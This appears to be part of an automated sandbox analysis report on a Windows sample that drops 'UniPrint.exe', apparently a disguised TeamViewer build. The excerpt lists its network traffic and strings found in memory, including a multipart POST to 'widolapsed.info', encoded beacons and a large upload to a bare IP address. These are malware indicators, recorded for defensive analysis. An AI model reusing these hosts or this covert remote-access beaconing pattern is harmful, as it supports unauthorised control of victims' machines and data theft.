Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------3157952906User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.198.151
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=100000012
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001N&
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001v
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002l
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000001&client=DynGate
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGated
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000003.00000002.538052811.0000024FB000E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001
Source: UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001ayTo-UPnP-E
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001q
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001&%
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001ZqcGy
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082859&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002er12.teamviewer.com
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082873&client=DynGate&p=10000002W
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5Mko
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeq
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=4082873&client=DynGate&p=100
Source: wogZe27GBB.exe, wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com/help
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000002.00000002.294871479.0000000002870000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.349624220.0000000002830000.00000004.00000001.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000003.344077474.00000000028E1000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372091300.0000000002860000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000003.370863061.0000000002831000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/company/index.aspx
